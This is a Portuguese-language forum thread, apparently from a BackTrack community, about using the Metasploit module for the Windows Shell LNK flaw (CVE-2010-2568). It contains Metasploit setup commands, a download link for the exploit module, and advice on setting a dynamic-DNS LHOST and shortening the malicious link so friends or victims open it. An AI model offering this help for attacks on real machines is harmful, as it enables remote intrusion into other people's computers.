[video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video Demo

[pinha]

requer uma configuração para que você possa usar o metasploit na internet.
OU
Seus amigos compartilham a mesma rede local que a sua?
[]'

Queria testar na internet nao localmente.. entendi que o backtrack emulado pelo virtualbox ele gera esse ip local 10.0.2.15 axei que funcionaria remotamente.. No caso teria que instalar o bt no hd pra poder configurar pela minha internet ou pelo virtualbox teria como ?

[Bhior]

Queria testar na internet nao localmente.. entendi que o backtrack emulado pelo virtualbox ele gera esse ip local 10.0.2.15 axei que funcionaria remotamente.. No caso teria que instalar o bt no hd pra poder configurar pela minha internet ou pelo virtualbox teria como ?

Se em sua configuração de rede, esse endereço IP foi atribuído pelo seu router, você pode configurar seu router, ou usar algum DNS publico ou pago, para usar o metasploit na internet.
Mas e uma coisa que não vou pode te mostrar.

Abraços

[espreto]

gerou normal o link do client
\\10.0.2.15\sRaVXmUk\
enviei pra alguns amigos para testar mas nada de abrir a sessao...

Com certeza nao abrirá nenhuma sessão!
Dê uma estudada sobre redes de computadores, endereçamento de IPs, entenda o que é LAN, WAN, MAN, PAN, etc... Se realmente quer aprender, você deve saber no mínimo os tópicos citados.

Procure a respeito dos payload *dns e utilize tbm o DynDns, com isso você pode deixar seu LHOST como blablabla.dyndns.net, exemplo:

Code:

set LHOST blablabla.dyndns.net

Ainda você pode utilizar os encurtadores de URL para o link acima!
Se não entendeu nada do que falei, pode estudar mais um pouco!

Att,

[pinha]

Muito obrigado bhior e espreto me ajudaram bastante sim!!
vou estudar mais sobre dns sim e checar esse DynDns

valeu

[Maque]

Boa noite pessoal;

Creio que nas versões mais atuais do metasploit o referido módulo(ms10_xxx_windows_shell_lnk_execute) tenha uma nome diferente, pelo menos aqui na versão 3.5.2 não consegui encontrar este módulo, encontrei apenas: windows/browser/ms10_046_shortcut_icon_dllloarder.

Aproveitando a deixa do tópico, estou com uma pequena dúvida,
Tenho uma pequena rede caseira(2pcs) e estava tentando explorar essa vulnerabilidade, porém não consigo iniciar a sessão meterpreter. Estou usando slack 13.1 e a "vitima" windows XP, consigo ter acesso ao lnk e ao dll pelo IE, e no console do metasploit aparece os requests dos arquivos, porém a sessão nao inicia nem com reza brava.
Gostaria de saber se alguém tem alguma idéia do que possa ser.

[pinha]

Boa noite pessoal;

Creio que nas versões mais atuais do metasploit o referido módulo(ms10_xxx_windows_shell_lnk_execute) tenha uma nome diferente, pelo menos aqui na versão 3.5.2 não consegui encontrar este módulo, encontrei apenas: windows/browser/ms10_046_shortcut_icon_dllloarder.

Ola caro amigo... entao fera ele nao vem junto nao por padrao, axo que pode resolver vc atualizando seu msf

Code:

svn update /pentest/svn/framework3/

ou add ele manualmente... baixando pelo packetstorm

Code:

http://dl.packetstormsecurity.net/1007-exploits/ms10_xxx_windows_shell_lnk_execute.rb.txt

salve no seu bt renomeia ele pra .rb e mova para essa pasta..

/pentest/exploits/framework3/modules/exploits/windows/browser

agora perante os testes na sua rede nao posso te ajudar eu fiz uns testes pelo vm virtualbox mas nao tive bons resultados ainda.

[]s

[xcold]

Ola caro amigo... entao fera ele nao vem junto nao por padrao, axo que pode resolver vc atualizando seu msf

Code:

svn update /pentest/svn/framework3/

ou add ele manualmente... baixando pelo packetstorm

Code:

http://dl.packetstormsecurity.net/1007-exploits/ms10_xxx_windows_shell_lnk_execute.rb.txt

salve no seu bt renomeia ele pra .rb e mova para essa pasta..

/pentest/exploits/framework3/modules/exploits/windows/browser

agora perante os testes na sua rede nao posso te ajudar eu fiz uns testes pelo vm virtualbox mas nao tive bons resultados ainda.

[]s

Ola pessoal estou com o mesmo problema que o Maque, ja fiz os passos acima, o arquivo esta na pasta certa, mas quando procuro ele pelo console, ele nao aparece ( search ms10 ) ...
se tento usa-lo da o seguinte erro

msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute.rb
[-] Failed to load module: windows/browser/ms10_xxx_windows_shell_lnk_execute.rb

alguem sabe o que posso fazer ??

Obs. ja atualizei o metasploit..

msfupdate

[gatuso]

Existe alguma maneira, ou outro método de ter acesso ao disco, mas sem ter que utilizar engenharia social?

Cumpz

[espreto]

Ola pessoal estou com o mesmo problema que o Maque, ja fiz os passos acima, o arquivo esta na pasta certa, mas quando procuro ele pelo console, ele nao aparece ( search ms10 ) ...
se tento usa-lo da o seguinte erro



alguem sabe o que posso fazer ??

Obs. ja atualizei o metasploit..

Procure por CVE-2010-2568

Code:

msf > search CVE-2010-2568

[Maque]

Realmente foi feita a modificação do nome do módulo nas versões mais recentes:

Link do resultado da pesquisa no site do metasploit:
http://www.metasploit.com/modules/ex...icon_dllloader

Notem que na referencia consta o mesmo CVE.

Existe até um outro tópico referente a esta mesma vulnerabilidade:

http://www.backtrack-linux.org/forum...-proteger.html